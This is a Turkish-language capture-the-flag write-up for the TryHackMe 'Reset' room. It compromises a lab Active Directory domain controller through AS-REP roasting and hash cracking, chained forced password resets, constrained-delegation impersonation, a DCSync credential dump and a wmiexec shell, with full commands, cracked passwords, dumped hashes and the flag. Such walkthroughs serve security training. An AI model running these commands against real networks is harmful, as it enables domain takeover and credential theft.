THM - Reset
Enumeration
Nmap
Hedef sistemin açık portlarını belirlemek için klasik bir nmap taraması yapıyoruz:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
┌──(root㉿kali)-[~/thm/reset]
└─# nmap -p- -Pn -sV -sC -T4 10.112.180.16
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-10 05:02 -0400
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-06-10 09:03:47Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Issuer: commonName=HayStack.thm.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-09T08:56:59
| Not valid after: 2026-12-09T08:56:59
| MD5: 36e9 0dcf 19cd 0cc9 b5c3 bff4 c3df ca59
| SHA-1: 4f69 4186 334b 8777 974b e091 5128 5641 ef6d a8f5
| SHA-256: 5817 e911 572c 07a2 cc71 0c71 bc4c 00bf 0742 4ef1 da10 e239 99a0 7132 3c1f ee46
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAc6gAwIBAgIQdZBo4atvJYlMfbUeYGI3bzANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFIYXlTdGFjay50aG0uY29ycDAeFw0yNjA2MDkwODU2NTlaFw0y
| NjEyMDkwODU2NTlaMBwxGjAYBgNVBAMTEUhheVN0YWNrLnRobS5jb3JwMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAy1URu3cN5bT+RKeGZG6QmxyjVkMy
| k9DbZz4ve+BSOKn3vxIisDPB9Z5GH/OUJBVC5+QXcWI6jhCtbtYlZdcZ5aQ2PQ9f
| 2fCPseab1dO3notfqarmOklvVK/ud81SxCSSg+4Tkoa3KxOouQ65O+Zk6HJs3+Uc
| p16/Q+QZZviVJSRnS+mkNmNrlIx5s7R9+B2uDUJ1XPVXCmt/lbYNn1oKgsn8qnzn
| XfDrwbsAFpyTNDfVU3smZdiQQ9lZYcWa9Qn6rP497MAdX4D3fkhH6KLZ9zptghvC
| IQdouX+ZOSMnld9ZgkF709OPqTjAhWll0olQBWxkuOd9ksgcx2EU9leaBQIDAQAB
| oyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcN
| AQELBQADggEBAFQ8jmmrzYodjgSJne/HTMtOBJ+vJM3cVwUUlL+GmmyZ5axmjXXa
| HA3EaQGZUI1yGFsH1w/AMay0COnp340WKavU95cQ4+5UcU93DvTSMz+iyxAFmoPf
| d9n/2pIjka0sURy7bmkZaeAH1NfxAWKuJE0V6HJKQie5ViTLiW152Ktq3TxtbzFQ
| 5zO4JP9d4MVfPiMvPjOl2ZE7By/Ndiq7htZUSeVMGWllFN3ZUQT/eGSaPBmft4tV
| YCJohCC1OSJQPA3MDirk2pNz+oJM+lMnAcFAWGHGuc933mULJWOsZFJdfWBmic53
| 8yLecFEVO3lMFQp2Gny+dD9Ehs/os7HFzNk=
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: THM
| NetBIOS_Domain_Name: THM
| NetBIOS_Computer_Name: HAYSTACK
| DNS_Domain_Name: thm.corp
| DNS_Computer_Name: HayStack.thm.corp
| DNS_Tree_Name: thm.corp
| Product_Version: 10.0.17763
|_ System_Time: 2026-06-10T09:04:36+00:00
|_ssl-date: 2026-06-10T09:05:16+00:00; 0s from scanner time.
7680/tcp open tcpwrapped syn-ack ttl 126
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
49668/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49671/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49675/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49694/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49699/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-06-10T09:04:38
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 37491/tcp): CLEAN (Timeout)
| Check 2 (port 45756/tcp): CLEAN (Timeout)
| Check 3 (port 63387/udp): CLEAN (Timeout)
| Check 4 (port 17477/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
┌──(root㉿kali)-[~/thm/reset]
└─#
thm.corp, HayStack.thm.corp Bulduğumuz domainleri /etc/hosts dosyasına kaydedelim ve devam edelim.
SMB
Öncelikle guest erişimine izin veriliyor mu kontrol ediyorum ve paylaşımları listeliyorum. Daha sonrasında sistemdeki kullanıcı isimlerini topluyorum.
Data share’e okuma, yazma yetkimiz var.
İçerisinde bir takım pdf,txt dosyaları yer almakta.
LILY ONEILL kullanıcısının parolasını görmekteyiz.
Initial Access
Öncelikle elimdeki kullanıcı listesi ile pre_auth özelliği kapalı olan kullanıcıları tespit etmek için bir impacket dosyası çalıştırdım.
Elde ettiğim hash’leri hashcat yardımı ile kırmaya çalışıyorum.
1
2
3
4
┌──(root㉿kali)-[~/thm/reset]
└─# hashcat -m 18200 hashes /usr/share/wordlists/rockyou.txt --force
[...]
$krb5asrep$23$TABATHA_BRITT@THM.CORP:db0f36931818857ec42b61dba4c8ca5e$ae146e99d814bab0c13a26c163ec345294595129a71a8a279f4516380742316622bf7a8ac85bc84956a532c24d5cc72873b4dded9bacb7d24bddb7f9828a9d2a0144b8d29bf0290da5f488c05b9330ebba764f45a938d9ade2b29eec32d84a2c3a3a35d10dfd72081e75de637dc59ee1b4e5c072789c5c567ddf9788bd5bb09ce3ce1f8d56739de95b98cf980f52b126cce3f1279e270b4ad06cd29f23f5e63fa0d68e0ec90a2475b5a82162332c51722c264756ebb956f77783dfbbcf7d434fdee797f2539e7fa77ac2ee6cba7054d5d2f461d8e0db4b90fcbc1c63e8c3ed70f79d6bdf:marlboro(1985)
TABATHA_BRITT kullanıcısına da sahibiz. Elimdeki kimlik bilgilerini kullanarak kerberostable servis hesaplarını inceliyorum.
Buradaki servislerin hashlerini kırmaya çalıştım fakat başarısızlık.
BloodHound
Bloodhound aracı ile ad yapısını incelediğimizde bir yol keşfediyoruz. Bu yol darla kullanıcısına gidene kadar parola değiştirme işlemini tekrar ediyor.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/tools/windows]
└─# pth-net rpc password "SHAWNA_BRAY" 'Password123!' -U "thm.corp"/"TABATHA_BRITT"%'marlboro(1985)' -S 10.114.182.60
Password for [THM.CORP\TABATHA_BRITT]:
E_md4hash wrapper called.
┌──(root㉿kali)-[~/tools/windows]
└─# nxc smb 10.114.182.60 -u 'SHAWNA_BRAY' -p 'Password123!'
SMB 10.114.182.60 445 HAYSTACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.114.182.60 445 HAYSTACK [+] thm.corp\SHAWNA_BRAY:Password123!
┌──(root㉿kali)-[~/tools/windows]
└─# pth-net rpc password "CRUZ_HALL" 'Password123!' -U "thm.corp"/"SHAWNA_BRAY"%'Password123!' -S 10.114.182.60
E_md4hash wrapper called.
┌──(root㉿kali)-[~/tools/windows]
└─# pth-net rpc password "DARLA_WINTERS" 'Password123!' -U "thm.corp"/"CRUZ_HALL"%'Password123!' -S 10.114.182.60
E_md4hash wrapper called.
┌──(root㉿kali)-[~/tools/windows]
└─#
En son darla kullanıcısına erişim sağladık.
DARLA_WINTERS hesabının delegation yetkisi var yani DARLA_WİNTERS, HAYSTACK sunucusu için “başkasının kimliğiyle gidebilme” yetkisi var.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
──(root㉿kali)-[~/thm/reset]
└─# faketime "$(ntpdate -q 10.114.138.148 | cut -d ' ' -f 1-3)" impacket-getST -spn cifs/HayStack.thm.corp -impersonate administrator -dc-ip 10.114.138.148 thm.corp/DARLA_WINTERS -hashes :2b576acbe6bcfda7294d6bd18041b8fe
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_HayStack.thm.corp@THM.CORP.ccache
┌──(root㉿kali)-[~/thm/reset]
└─# export KRB5CCNAME=administrator@cifs_HayStack.thm.corp@THM.CORP.ccache
┌──(root㉿kali)-[~/thm/reset]
└─# impacket-secretsdump -k -no-pass administrator@HayStack.thm.corp -dc-ip 10.114.138.148 -target-ip 10.114.138.148 -just-dc-user Administrator
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:067a84e5afaed843ed4a8fdac5facac3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f2313ddc9686cd8ea1e67586173d3218bdc897a3c717dea005d31d8280291d75
Administrator:aes128-cts-hmac-sha1-96:a221004822c82f96664e247308ce6904
Administrator:des-cbc-md5:1cdac7ae988a5b32
[*] Cleaning up...
┌──(root㉿kali)-[~/thm/reset]
└─#
Darla kullanıcısının kimlik bilgileri ile admin adına bir service ticket talep ediyorum. Kerberos işlemleri için saat farkına dikkat edelim. Bunun için faketime komutunu kullanıyorum.
Ticket’ı kaydettikten sonra DCSync gerçekleştirebilirim. Veya direkt shell alabilirim.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root㉿kali)-[~/thm/reset]
└─# impacket-wmiexec -k -no-pass -dc-ip 10.114.138.148 administrator@HayStack.thm.corp -target-ip 10.114.138.148
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
thm\administrator
C:\>cd Users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users
08/21/2023 08:33 PM <DIR> .
08/21/2023 08:33 PM <DIR> ..
07/10/2023 10:23 AM <DIR> Administrator
01/26/2024 09:02 PM <DIR> automate
06/13/2026 06:24 PM <DIR> CECILE_WONG
06/16/2023 04:17 PM <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 12,385,644,544 bytes free
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\Administrator\Desktop
07/14/2023 07:23 AM <DIR> .
07/14/2023 07:23 AM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
06/16/2023 04:37 PM 30 root.txt
3 File(s) 1,111 bytes
2 Dir(s) 12,385,447,936 bytes free
C:\Users\Administrator\Desktop>type root.txt
THM{RE_RE_RE_SET_AND_DELEGATE}
C:\Users\Administrator\Desktop>
vesselam.






